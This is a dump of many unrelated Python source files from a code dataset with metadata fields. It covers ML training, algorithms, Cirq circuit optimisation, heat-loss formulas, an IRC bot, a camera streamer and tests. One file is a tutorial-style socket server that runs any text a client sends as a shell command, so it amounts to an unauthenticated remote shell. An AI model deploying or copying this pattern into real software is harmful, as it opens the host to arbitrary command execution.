4\nBATCH_SIZE = 4\nINITIAL_LEARNING_RATE = 1e-2\nMOMENTUM = 0.9\n\ndef main(argv):\n\tdata_loader = DataLoader('../data/only_folder', BATCH_SIZE)\n\n\twith tf.device('/cpu:0'):\n\t\tconfig = tf.ConfigProto()\n\t\tgraph = tf.Graph()\n\n\t\twith graph.as_default():\n\t\t\tlogging.debug('Starting new TensorFlow graph.')\n\t\t\t#======================TODO========================\n\t\t\tinputs_placeholder = tf.placeholder(tf.int32, [None, None, NUM_FEATURES])\n\t\t\tlabels = tf.sparse_placeholder(tf.int32)\n\t\t\tseq_len = tf.placeholder(tf.int32, [None])\n\t\t\tphase_placeholder = tf.placeholder(tf.string)\n\t\t\t#==============================================\n\n\t\t\tmodel = MyModel(LST_NUM_HIDDEN, NUM_CLASSES, BATCH_SIZE)\n\n\t\t\tlogits = model.forward(inpt, phase_placeholder)\n\t\t\tcost = model.ctc_loss(labels, logits, seq_len)\n\n\t\t\toptim = tf.train.MomentumOptimizer(INITIAL_LEARNING_RATE, 0.9).minimize(cost)\n\t\t\tdecoded, neg_sum_logits = tf.nn.ctc_greedy_decoder(logits, seq_len)\n\n\t\t\tlabel_error_rate = tf.reduce_mean(tf.edit_distance(tf.cast(decoded[0], tf.int32), labels))\n\n\t\twith tf.Session(config = config, graph = graph) as sess:\n\t\t\tlogging.debug('Starting TensorFlow session.')\n\n\t\t\tsaver = tf.train.Saver()\n\n\t\t\tmerged_summary = tf.summary.merge_all()\n\t\t\tsummary_writer = tf.summary.FileWriter(SUMMARY_PATH, tf.get_default_graph())\n\n\t\t\ttf.global_variables_initializer().run()\n\n\t\t\ttrain_num = data_loader.get_train_size()\n\t\t\tvalidation_num = data_loader.get_valid_size()\n\n\t\t\tif train_num <= 0:\n\t\t\t\tlogging.error('There are no trainig example')\n\t\t\t\treturn\n\n\t\t\tnum_batches_per_epoch = math.ceil(train_num/BATCH_SIZE)\n\n\t\t\tfor phase in ['normal', 'sparse']:\n\t\t\t\tfor current_epoch in range(NUMBER_EPOCHS):\n\t\t\t\t\tstart_time = time.time()\n\n\t\t\t\t\ttrain_cost = 0\n\t\t\t\t\ttrain_label_error_rate = 0\n\n\t\t\t\t\tfor step in range(num_batches_per_epoch):\n\t\t\t\t\t\tbatch = data_loader.get_train_batch()\n\t\t\t\t\t\tfeed = {inputs : batch[0],\n\t\t\t\t\t\t\t\tlabels : batch[1],\n\t\t\t\t\t\t\t\tseq_len : batch[2],\n\t\t\t\t\t\t\t\tphase : phase}\n\n\t\t\t\t\t\tbatch_cost, _, summary = sess.run([cost, optim, merged_summary], feed)\n\t\t\t\t\t\t\n\t\t\t\t\t\ttrain_cost += batch_cost * BATCH_SIZE\n\t\t\t\t\t\ttrain_label_error_rate += sess.run(label_error_rate, feed) * BATCH_SIZE\n\n\t\t\t\t\t\tsummary_writer.add_summary(summary, current_epoch * num_batches_per_epoch + step)\n\n\t\t\t\ttrain_cost /= train_num\n\t\t\t\ttrain_label_error_rate /= train_num\n\n\t\t\t\tvalid = data_loader.get_valid()\n\t\t\t\tvalid_feed = {inputs : valid[0],\n\t\t\t\t\t\t\t labels : valid[1],\n\t\t\t\t\t\t\t seq_len : valid[2]}\n\n\t\t\t\tvalidation_cost, validation_label_error_rate = sess.run([cost, label_error_rate], valid_feed)\n\t\t\t\tvalidation_cost /= validation_num\n\t\t\t\tvalidation_label_error_rate /= validation_num\n\n\t\t\t\tlogging.info('Epoch %d/%d (time: %.3f s)', current_epoch + 1, NUM_EPOCHS, time.time() - start_time)\n\t\t\t\tlogging.info('Train cost: %.3f, train label error rate: %.3f', train_cost, train_label_error_rate)\n\t\t\t\tlogging.info('Validation cost: %.3f, validation label error rate: %.3f', train_cost, train_label_error_rate)\n\n\n\t\t# test_feed = {inputs : test_inputs,\n\t\t# \t\t\t seq_len : test_seq_len}\n\n\t\t# decoded_outputs = sess.run(decoded[0], test_feed)\n\t\t# dense_decoded = tf.sparse_tuples_from_sequences(decoded_outputs, default_value = -1).eval(session = sess)\n\t\t# test_num = test_texts.shape[0]\n\n\t\t# for i, sequence in enumerate(dense_decoded):\n\t\t# \tsequence = [s for s in sequence if s != -1]\n\t\t# \tdecoded_text = utils.sequence_decoder(sequence)\n\n\t\t# \tlogging.info('Sequence %d/%d', i + 1, test_num)\n\t\t# \tlogging.info('Original: \\n%s', test_texts[i])\n\t\t# \tlogging.info('Decoded: \\n %s', decoded_text)\n\n\t\tsave_path = saver.save(sess, MODEL_PATH)\n\t\tlogging.info('Model saved in file: %s', save_path)\n\nif __name__ == '__main__':\n\ttf.app.run()\n\n\n\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"35112216","text":"# Maximum subarray\n\ndef maxSubList(A):\n best, curr = 0, 0\n currIndx, strtIndx, bestIndx = 0, 0, 0\n \n for i, j in enumerate(A):\n if (curr + j > 0):\n curr += j\n else:\n curr = 0\n currIndx = i + 1\n if curr > best:\n strtIndx = currIndx\n bestIndx = i + 1\n best = curr\n return strtIndx, bestIndx, best\n\nA = [-1,3,-5,4,6,-1,2,-7,13,-3]\n\nstart, end, total = maxSubList(A)\nprint('The max sublist (total: {}) \\\nstarts at {}, ends at {}'.format(total,start,end-1))","sub_path":"algorithms/maxSubList.py","file_name":"maxSubList.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"142398784","text":"size = []\n\nff = open('updatedSchema.txt', \"w+\")\nf = open('test.txt', \"r\")\nfor line in f:\n l = line.split(\",\")\n for newLine in open('schema.txt'):\n if(newLine.startswith(l[0])):\n size.append(newLine)\n if((len(size))>1):\n print(max(size))\n ff.write(max(size))\n ff.write('\\n')\n else:\n ff.write(str(size[0]))\n ff.write('\\n')\n print(len(size)) \n print(size)\n size = []\n\n\nwith open('updatedSchema.txt','w+') as file:\n for line in file:\n if not line.isspace():\n file.write(line)\n\nff.truncate()\nf.close()\nff.close()\n \n \n","sub_path":"Progress review/new.py","file_name":"new.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"307955316","text":"from thunder import ThunderContext\nfrom thunder import SourceExtraction\n\nfrom test_utils import PySparkTestCase\n\n\nclass TestBlockMethod(PySparkTestCase):\n\n def test_nmf(self):\n \"\"\"\n (BlockMethod) nmf with defaults\n \"\"\"\n tsc = ThunderContext(self.sc)\n data = tsc.makeExample('sources', dims=(60, 60), centers=[[20, 20], [40, 40]], noise=0.1, seed=42)\n\n model = SourceExtraction('nmf').fit(data, size=(30, 30))\n\n # order is irrelevant, but one of these must be true\n ep = 0.25\n cond1 = (model[0].distance([20, 20]) < ep) and (model[1].distance([40, 40]) < ep)\n cond2 = (model[0].distance([40, 40]) < ep) and (model[1].distance([20, 20]) < ep)\n assert(cond1 or cond2)\n","sub_path":"python/test/test_block_methods.py","file_name":"test_block_methods.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"392568177","text":"# Copyright 2018 The Cirq Developers\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"A combination of several optimizations targeting XmonDevice.\"\"\"\nfrom functools import lru_cache\nfrom typing import Callable, cast, Optional, TYPE_CHECKING\n\nimport numpy as np\n\nimport cirq\nfrom cirq_google import ops as cg_ops\nfrom cirq_google.transformers.target_gatesets import sycamore_gateset\n\nif TYPE_CHECKING:\n import cirq_google\n\n\n_TARGET_GATESETS = {\n 'sqrt_iswap': lambda atol, _: cirq.SqrtIswapTargetGateset(atol=atol),\n 'sycamore': lambda atol, tabulation: sycamore_gateset.SycamoreTargetGateset(\n atol=atol, tabulation=tabulation\n ),\n 'xmon': lambda atol, _: cirq.CZTargetGateset(atol=atol),\n 'xmon_partial_cz': lambda atol, _: cirq.CZTargetGateset(atol=atol, allow_partial_czs=True),\n}\n\n\n@lru_cache()\ndef _gate_product_tabulation_cached(\n optimizer_type: str, tabulation_resolution: float\n) -> cirq.TwoQubitGateTabulation:\n random_state = np.random.RandomState(51)\n if optimizer_type == 'sycamore':\n return cirq.two_qubit_gate_product_tabulation(\n cirq.unitary(cg_ops.SYC), tabulation_resolution, random_state=random_state\n )\n else:\n raise NotImplementedError(f\"Two qubit gate tabulation not supported for {optimizer_type}\")\n\n\ndef optimized_for_sycamore(\n circuit: cirq.Circuit,\n *,\n qubit_map: Callable[[cirq.Qid], cirq.GridQubit] = lambda e: cast(cirq.GridQubit, e),\n optimizer_type: str = 'sqrt_iswap',\n tolerance: float = 1e-5,\n tabulation_resolution: Optional[float] = None,\n) -> cirq.Circuit:\n \"\"\"Optimizes a circuit for Google devices.\n\n Uses a set of optimizers that will compile to the proper gateset for the\n device (xmon, sqrt_iswap, or sycamore gates) and then use optimizers to\n compress the gate depth down as much as is easily algorithmically possible\n by merging rotations, ejecting Z gates, etc.\n\n Args:\n circuit: The circuit to optimize.\n qubit_map: Transforms the qubits (e.g. so that they are GridQubits).\n optimizer_type: A string defining the optimizations to apply.\n Possible values are 'xmon', 'xmon_partial_cz', 'sqrt_iswap',\n 'sycamore'\n tolerance: The tolerance passed to the various circuit optimization\n passes.\n tabulation_resolution: If provided, compute a gateset tabulation\n with the specified resolution and use it to approximately\n compile arbitrary two-qubit gates for which an analytic compilation\n is not known.\n Returns:\n The optimized circuit.\n\n Raises:\n ValueError: If the `optimizer_type` is not a supported type.\n \"\"\"\n copy = circuit.copy()\n if optimizer_type not in _TARGET_GATESETS:\n raise ValueError(\n f'{optimizer_type} is not an allowed type. Allowed '\n f'types are: {_TARGET_GATESETS.keys()}'\n )\n\n tabulation: Optional[cirq.TwoQubitGateTabulation] = None\n if tabulation_resolution is not None:\n tabulation = _gate_product_tabulation_cached(optimizer_type, tabulation_resolution)\n\n if optimizer_type in _TARGET_GATESETS:\n copy = cirq.optimize_for_target_gateset(\n circuit,\n gateset=_TARGET_GATESETS[optimizer_type](tolerance, tabulation),\n context=cirq.TransformerContext(deep=True),\n )\n copy = cirq.merge_single_qubit_gates_to_phxz(copy, atol=tolerance)\n copy = cirq.eject_phased_paulis(copy, atol=tolerance)\n copy = cirq.eject_z(copy, atol=tolerance)\n copy = cirq.drop_negligible_operations(copy, atol=tolerance)\n\n ret = cirq.Circuit(\n (op.transform_qubits(qubit_map) for op in copy.all_operations()),\n strategy=cirq.InsertStrategy.EARLIEST,\n )\n return ret\n","sub_path":"cirq-google/cirq_google/optimizers/optimize_for_sycamore.py","file_name":"optimize_for_sycamore.py","file_ext":"py","file_size_in_byte":4277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"603349861","text":"import pandas as pd\nimport numpy as np\n\n\ndef calculate_fabric_heat_loss(\n roof_area,\n roof_uvalue,\n wall_area,\n wall_uvalue,\n floor_area,\n floor_uvalue,\n window_area,\n window_uvalue,\n door_area,\n door_uvalue,\n thermal_bridging_factor,\n):\n plane_elements_area = roof_area + floor_area + door_area + wall_area + window_area\n thermal_bridging = thermal_bridging_factor * plane_elements_area\n heat_loss_via_plane_elements = (\n wall_area * wall_uvalue\n + roof_area * roof_uvalue\n + floor_area * floor_uvalue\n + window_area * window_uvalue\n + door_area * door_uvalue\n )\n\n return thermal_bridging + heat_loss_via_plane_elements\n\n\ndef calculate_building_volume(\n ground_floor_area=None,\n ground_floor_height=None,\n first_floor_area=None,\n first_floor_height=None,\n second_floor_area=None,\n second_floor_height=None,\n third_floor_area=None,\n third_floor_height=None,\n no_of_storeys=None,\n floor_area=None,\n assumed_floor_height=None,\n):\n if ground_floor_area is not None:\n building_volume = (\n ground_floor_area * ground_floor_height\n + first_floor_area.fillna(0) * first_floor_height.fillna(0)\n + second_floor_area.fillna(0) * second_floor_height.fillna(0)\n + third_floor_area.fillna(0) * third_floor_height.fillna(0)\n )\n elif no_of_storeys is not None:\n building_volume = floor_area * no_of_storeys * assumed_floor_height\n else:\n raise ValueError(\n \"Must specify either 'no_of_storeys'\"\n \"or floor areas & heights to calculate building volume!\"\n )\n\n return building_volume\n\n\ndef calculate_ventilation_heat_loss(\n building_volume,\n effective_air_rate_change,\n):\n ventilation_heat_loss_constant = 0.33 # SEAI, DEAP 4.2.0\n return building_volume * ventilation_heat_loss_constant * effective_air_rate_change\n\n\ndef calculate_heat_loss_parameter(\n roof_area,\n roof_uvalue,\n wall_area,\n wall_uvalue,\n floor_area,\n floor_uvalue,\n window_area,\n window_uvalue,\n door_area,\n door_uvalue,\n total_floor_area,\n thermal_bridging_factor,\n effective_air_rate_change,\n ground_floor_area=None,\n ground_floor_height=None,\n first_floor_area=None,\n first_floor_height=None,\n second_floor_area=None,\n second_floor_height=None,\n third_floor_area=None,\n third_floor_height=None,\n no_of_storeys=None,\n assumed_floor_height=2.5,\n) -> pd.DataFrame:\n fabric_heat_loss = calculate_fabric_heat_loss(\n roof_area=roof_area,\n roof_uvalue=roof_uvalue,\n wall_area=wall_area,\n wall_uvalue=wall_uvalue,\n floor_area=floor_area,\n floor_uvalue=floor_uvalue,\n window_area=window_area,\n window_uvalue=window_uvalue,\n door_area=door_area,\n door_uvalue=door_uvalue,\n thermal_bridging_factor=thermal_bridging_factor,\n )\n building_volume = calculate_building_volume(\n ground_floor_area=ground_floor_area,\n ground_floor_height=ground_floor_height,\n first_floor_area=first_floor_area,\n first_floor_height=first_floor_height,\n second_floor_area=second_floor_area,\n second_floor_height=second_floor_height,\n third_floor_area=third_floor_area,\n third_floor_height=third_floor_height,\n no_of_storeys=no_of_storeys,\n floor_area=floor_area,\n assumed_floor_height=assumed_floor_height,\n )\n ventilation_heat_loss = calculate_ventilation_heat_loss(\n building_volume=building_volume,\n effective_air_rate_change=effective_air_rate_change,\n )\n heat_loss_coefficient = fabric_heat_loss + ventilation_heat_loss\n return heat_loss_coefficient / total_floor_area\n","sub_path":"dublin_building_stock/deap.py","file_name":"deap.py","file_ext":"py","file_size_in_byte":3793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"569253782","text":"import requests\n\ndef lookup(word, api_key):\n payload = {'api_key': api_key, 'limit': 1}\n try:\n response = requests.get(\"http://api.wordnik.com:80/v4/word.json/%s/definitions\" % word.lower(), params=payload).json()\n return response[0]['text']\n except:\n return None\n\ndef define(phenny, input):\n word = input.group(2)\n if not word:\n phenny.say(\"-- .define \")\n else:\n definition = lookup(word, phenny.config.wordnik_api_key)\n if definition is None:\n phenny.say(\"Word not found!\")\n else:\n phenny.say(\"%s: %s\" % (word, definition))\ndefine.commands = ['define']\n\n\ndef wotd(phenny, input):\n payload = {'api_key': phenny.config.wordnik_api_key}\n response = requests.get(\"http://api.wordnik.com:80/v4/words.json/wordOfTheDay\", params=payload).json()\n definition = lookup(response['word'], phenny.config.wordnik_api_key)\n phenny.say(\"Word of the day: %s - %s\" % (response['word'], definition))\n\n \nwotd.commands = ['wotd']\n\ndef rword(phenny, input):\n payload = {'api_key': phenny.config.wordnik_api_key,\n 'hasDictionaryDef': 'true' }\n response = requests.get(\"http://api.wordnik.com:80/v4/words.json/randomWord\", params=payload).json()\n definition = lookup(response['word'], phenny.config.wordnik_api_key)\n phenny.say(\"Random word: %s - %s\" % (response['word'], definition))\nrword.commands = ['rword']\n","sub_path":"modules/dict.py","file_name":"dict.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"31830128","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author:Liang Lian\n\nimport json\nimport socket\nimport subprocess\n\nip_port = ('127.0.0.1', 8000)\n# 创建socket对象\ns = socket.socket()\n# 侦听的IP和端口\ns.bind(ip_port)\n# 设置client最大等待连接数,最多等待五个连接,其他的直接报错\ns.listen(5)\nwhile True: # 循环\n\n # 只有accept & recv 会阻塞,这里accept阻塞,直到有client连接过来\n # accept()接受客户端发送过来的请求:connection代表客户端对象,address是客户端的IP\n connection, address = s.accept()\n\n while True:\n try:\n # recv()接收客户端信息\n recv_data = connection.recv(1024)\n\n # 如果为空则退出这层循环,不做操作\n if not recv_data:\n break\n\n # 接收到client端发送过来的指令并执行\n p = subprocess.Popen(str(recv_data, encoding='utf-8'), shell=True, stdout=subprocess.PIPE)\n # 获取命令输出结果\n res = p.stdout.read()\n if res:\n send_data = str(res, encoding='utf-8')\n else:\n send_data = 'cmd error'\n\n # str转换bytes\n send_data = bytes(send_data, encoding='utf-8')\n\n # 发送准备就绪和准备要发送的内容长度,防止粘包(发送内容超出接收端内容,多出的内容出现在下一次接收得内容中)\n '''\n 粘包: 命令执行结果返回字符串长度为2018,如果客户端只接受1024,就接受了一次,那么多出来的内容回去哪呢,\n 多出来的内容会出现在下一次返回前头,这就是粘包(分包传递,内容接收端发生错误)\n '''\n # 讲要发送的内容信息json格式发送客户端,客户端好做好准备接收\n ready_dict = {'status': 'Ready',\n 'msg_size': len(send_data),}\n ready_tag = json.dumps(ready_dict)\n connection.send(bytes(ready_tag, encoding='utf-8'))\n\n # 等待client 'Start'信号后开始\n feedback = connection.recv(1024) # Start\n feedback = str(feedback, encoding='utf-8')\n if feedback == 'Start':\n # 发送指令返回结果的内容\n connection.send(send_data)\n\n except Exception:\n break\n\n # 关闭和client的连接\n connection.close()\n\n\n","sub_path":"day9/远程执行命令/socket_server.py","file_name":"socket_server.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"390400717","text":"#!/usr/bin/python\n\nimport sys\nimport socket\nimport logging\n\nfrom twisted.internet.task import LoopingCall\nfrom twisted.internet import reactor\n\nfrom instrumentation import sensorsDiscover\nfrom client import CarbonReporter\n\n\nclass Application(object):\n def __init__(self):\n self.__log = logging.getLogger(\"carbid\")\n #\n self.__prefix = \"carbid\"\n self.cr = CarbonReporter(\"172.16.49.42\", 2003)\n self.record_task = LoopingCall(self.recordMetrics)\n self.sensors = []\n self.sensors = sensorsDiscover()\n #\n self.HOSTNAME = socket.gethostname().replace('.','_')\n\n def dispose(self):\n self.record_task.stop()\n\n def run(self):\n self.record_task.start(15, False)\n reactor.run()\n\n def record(self, metric, value):\n #\n path = []\n path.append(self.__prefix)\n path.append(self.HOSTNAME)\n path.append(metric)\n #\n fullMetric = \".\".join(path)\n #\n self.__log.debug(\"Report {name} => {value}\".format(name=fullMetric, value=value))\n #\n self.cr.sendDatapoint(fullMetric, value)\n\n def recordMetrics(self):\n for sensor in self.sensors:\n sensor_name = sensor.name\n sensor_value = sensor.sense()\n #\n self.record(sensor_name, sensor_value)\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(stream=sys.stderr, level=logging.INFO)\n app = Application()\n try:\n app.run()\n except Exception as err:\n app.dispose()\n ","sub_path":"lib/carbid/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"465492194","text":"#!/usr/bin/python3\n\n# -----------------------------------------------------------------------------\n# Libraries\n# -----------------------------------------------------------------------------\nimport socket\nimport time\nimport picamera\nimport sys\n\n# -----------------------------------------------------------------------------\n# Global definitions\n# -----------------------------------------------------------------------------\nDEBUG = False\nVIDEO_RESOLUTION = (640,480)\nVIDEO_FRAMERATE = 24\nVIDEO_FORMAT = 'h264'\nVIDEO_LENGTH = -1\nSERVER_IP = '0.0.0.0'\nSERVER_PORT = 10004\n\n# -----------------------------------------------------------------------------\n# Functions\n# -----------------------------------------------------------------------------\ndef start_video_server():\n if DEBUG: print(\"[MSG]> start video server\")\n \n # Open listening TCP socket\n with socket.socket() as server_socket:\n server_socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR, 1)\n server_socket.bind((SERVER_IP, SERVER_PORT))\n server_socket.listen(0)\n if DEBUG: print(\"[MSG]> listening on %s:%d\" % (SERVER_IP, SERVER_PORT))\n\n # Client is connected\n (client_socket, client_address) = server_socket.accept()\n if DEBUG: print(\"[MSG]> connection from %s:%d\" % (client_address))\n connection = client_socket.makefile('wb')\n\n # Open camera device\n with picamera.PiCamera() as camera:\n # Set camera configuration\n camera.resolution = VIDEO_RESOLUTION\n camera.framerate = VIDEO_FRAMERATE\n #camera.hflip = True\n #camera.vflip = True\n #camera.rotation = 90\n \n # Start camera streaming\n try:\n if DEBUG: print(\"[MSG]> start video capture\")\n camera.start_preview()\n time.sleep(1)\n camera.start_recording(connection, format=VIDEO_FORMAT)\n while True:\n camera.wait_recording(VIDEO_LENGTH)\n finally:\n camera.stop_recording()\n\n# -----------------------------------------------------------------------------\n# Main\n# -----------------------------------------------------------------------------\nif __name__ == \"__main__\":\n while 1:\n try:\n start_video_server()\n except KeyboardInterrupt:\n print(\"\\r\\n[MSG]> CTRL-C - keyboard interupt\")\n sys.exit(0)\n except BaseException as e:\n if DEBUG: print(\"[MSG]> error: exception %s\" % e)\n time.sleep(1)\n \n","sub_path":"rover_video_module_TCP.py","file_name":"rover_video_module_TCP.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"65705453","text":"import json\nimport threading\nimport unittest\n# based on scaling_multiplier: 0.60\nfrom typing import Any\n\nfrom ev3dev2simulator.config.config import get_config\nfrom ev3dev2simulator.connection.ClientSocketHandler import ClientSocketHandler\nfrom ev3dev2simulator.state.RobotState import RobotState\n\n\nclass ServerSocketTest(unittest.TestCase):\n\n def test_process_drive_command_degrees(self):\n d = {\n 'type': 'RotateCommand',\n 'address': 'ev3-ports:outA',\n 'speed': 10,\n 'distance': 100,\n 'stop_action': 'hold'\n }\n\n robot_state = RobotState()\n server = ClientSocketHandler(robot_state, None, 'left_brick')\n\n data = server._process_drive_command(d)\n val = self._deserialize(data)\n\n self.assertEqual(10, val)\n\n\n def test_process_drive_command_pixels(self):\n d = {\n 'type': 'RotateCommand',\n 'address': 'ev3-ports:outB',\n 'speed': 10,\n 'distance': 100,\n 'stop_action': 'hold'\n }\n\n robot_state = RobotState()\n server = ClientSocketHandler(robot_state, None, 'left_brick')\n\n data = server._process_drive_command(d)\n val = self._deserialize(data)\n\n self.assertEqual(10, val)\n\n\n def test_process_stop_command(self):\n d = {\n 'type': 'StopCommand',\n 'address': 'ev3-ports:outD',\n 'speed': 100,\n 'stop_action': 'coast'\n }\n\n robot_state = RobotState()\n server = ClientSocketHandler(robot_state, None, 'left_brick')\n\n data = server._process_stop_command(d)\n val = self._deserialize(data)\n\n self.assertAlmostEqual(0.0667, val, 3)\n\n\n def test_process_sound_command(self):\n d = {\n 'type': 'SoundCommand',\n 'message': 'A test is running at the moment!',\n }\n\n frames_per_second = get_config().get_data()['exec_settings']['frames_per_second']\n frames = int(round((32 / 2.5) * frames_per_second))\n robot_state = RobotState()\n\n server = ClientSocketHandler(robot_state, None, 'left_brick')\n server._process_sound_command(d)\n\n for i in range(frames):\n self.assertIsNotNone(robot_state.next_sound_job())\n\n self.assertIsNone(robot_state.next_sound_job())\n\n\n def test_process_data_request(self):\n d = {\n 'type': 'DataRequest',\n 'address': 'ev3-ports:in4',\n }\n\n robot_state = RobotState()\n robot_state.values['left_brick:ev3-ports:in4'] = 10\n robot_state.locks['left_brick:ev3-ports:in4'] = threading.Lock()\n\n server = ClientSocketHandler(robot_state, None, 'left_brick')\n data = server._process_data_request(d)\n val = self._deserialize(data)\n\n self.assertEqual(val, 10)\n\n\n def _deserialize(self, data: bytes) -> Any:\n \"\"\"\n Deserialize the given data.\n :param data: to be deserialized.\n :return: any type representing value inside the data.\n \"\"\"\n\n val = data.decode()\n obj_dict = json.loads(val)\n\n return obj_dict['value']\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test/ev3dev2/simulator/connection/ServerSocketTest.py","file_name":"ServerSocketTest.py","file_ext":"py","file_size_in_byte":3199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"139141839","text":"# import cv2\r\n# import numpy as np\r\n# # img = cv2.imread(\"lena.jpg\")\r\n# # blank = np.zeros((512,512,3), np.uint8)\r\n# # cv2.imshow(\"blank\",blank)\r\n# # cv2.waitKey(0)\r\n#\r\n# events = [i for i in dir(cv2) if 'EVENT' in i]\r\n# print(events)\r\n# drawing = False\r\n# mode =True\r\n# ix , iy = 1,1\r\n#\r\n# # mouse callback function\r\n# def draw_circle(event,x,y,flags,param):\r\n# global ix , iy , mode, drawing\r\n#\r\n# if event == cv2.EVENT_LBUTTONDOWN:\r\n# drawing = True\r\n# ix,iy = x,y\r\n# elif event == cv2.EVENT_MOUSEMOVE:\r\n# if drawing == True:\r\n# if mode == True:\r\n# cv2.rectangle(img,(ix,iy),(x,y),(0.255,0),-1)\r\n# else:\r\n# cv2.circle(img,(x,y),5,(0,255,0),-1)\r\n# elif event == cv2.EVENT_LBUTTONUP:\r\n# drawing = False\r\n# if mode == True:\r\n# cv2.rectangle(img, (ix, iy), (x, y), (0, 255, 0), -1)\r\n# else:\r\n# cv2.circle(img, (x, y), 5, (0, 0, 255), -1)\r\n#\r\n#\r\n# # Create a black image, a window and bind the function to window\r\n# img = np.zeros((512,512,3), np.uint8)\r\n# cv2.namedWindow('image')\r\n# cv2.setMouseCallback('image',draw_circle)\r\n#\r\n# while(1):\r\n# cv2.imshow('image',img)\r\n# k = cv2.waitKey(0) & 0xFF\r\n# if k == ord('m'):\r\n# mode = not mode\r\n# elif k == ord('q'):\r\n# break\r\n# cv2.destroyAllWindows()\r\n#\r\n#\r\n\r\n\r\n\r\nimport cv2\r\nimport numpy as np\r\n\r\n# events = [i for i in dir(cv2) if 'EVENT' in i]\r\n# print (events)\r\n\r\n\r\nfor i in dir(cv2):\r\n if 'EVENT' in i:\r\n # global events\r\n events = i\r\n\r\n print([events])\r\n\r\n\r\n\r\ndef draw_circle(event, x, y , flasgs, params):\r\n if event == cv2.EVENT_LBUTTONDBLCLK:\r\n cv2.circle(img, (x,y), 100, (255,0,0), -1)\r\n\r\n\r\nimg = np.zeros((512,512,3), np.uint8)\r\ncv2.namedWindow(\"image\")\r\ncv2.setMouseCallback('image', draw_circle)\r\n\r\n\r\nwhile(1):\r\n cv2.imshow('image', img)\r\n if cv2.waitKey(20) & 0xFF ==27:\r\n break\r\ncv2.destroyAllWindows\r\n\r\n\r\n\r\n","sub_path":"mouse_paint_brush.py","file_name":"mouse_paint_brush.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"488490632","text":"from django.conf import settings\nfrom django.test import TestCase\n\nfrom unittest import skipIf\n\nfrom geotrek.core.factories import TrailFactory, PathFactory\nfrom geotrek.authent.factories import UserFactory\nfrom geotrek.core.forms import TrailForm, PathForm\n\n\n@skipIf(not settings.TREKKING_TOPOLOGY_ENABLED, 'Test with dynamic segmentation only')\nclass TopologyFormTest(TestCase):\n def test_save_form_when_topology_has_not_changed(self):\n user = UserFactory()\n topo = TrailFactory()\n form = TrailForm(instance=topo, user=user)\n self.assertEqual(topo, form.instance)\n form.cleaned_data = {'topology': topo}\n form.save()\n self.assertEqual(topo, form.instance)\n\n\nclass PathFormTest(TestCase):\n def test_overlapping_path(self):\n user = UserFactory()\n PathFactory.create(geom='SRID=4326;LINESTRING(3 45, 3 46)')\n # Just intersecting\n form1 = PathForm(\n user=user,\n data={'geom': '{\"geom\": \"LINESTRING(2.5 45.5, 3.5 45.5)\", \"snap\": [null, null]}'}\n )\n self.assertTrue(form1.is_valid(), str(form1.errors))\n # Overlapping\n form2 = PathForm(\n user=user,\n data={'geom': '{\"geom\": \"LINESTRING(3 45.5, 3 46.5)\", \"snap\": [null, null]}'}\n )\n self.assertFalse(form2.is_valid(), str(form2.errors))\n","sub_path":"geotrek/core/tests/test_forms.py","file_name":"test_forms.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"603140413","text":"from typing import List\n\n\nclass Solution:\n def search(self, nums: List[int], target: int) -> int:\n l, r = 0, len(nums) - 1\n while l <= r:\n mid = l + (r-l) // 2\n if nums[mid] == target:\n return mid\n elif nums[mid] < target:\n l = mid + 1\n else:\n r = mid - 1\n return - 1\n\n\nif __name__ == \"__main__\":\n s = Solution()\n result = s.search([-1, 0, 3, 5, 9, 12], 9)\n print(result)\n","sub_path":"Algorithms/Easy/704. Binary Search/answer.py","file_name":"answer.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"399295329","text":"# 在原图上检验模型的定位效果\r\n\r\nimport os\r\nimport cv2\r\nimport keras\r\nimport numpy as np\r\n\r\nmodel_path = './models/loc_model/loc_model_20.h5'\r\ntest_img_path = './data/test/test2'\r\nwidth = 240\r\nheight = 27\r\nchannels_num = 3\r\n\r\n\r\ndef preprocess(src_img):\r\n norm_img = src_img / 255\r\n resize_img = cv2.resize(norm_img, (width, height))\r\n reshape_img = np.resize(resize_img, (height, width, channels_num))\r\n return 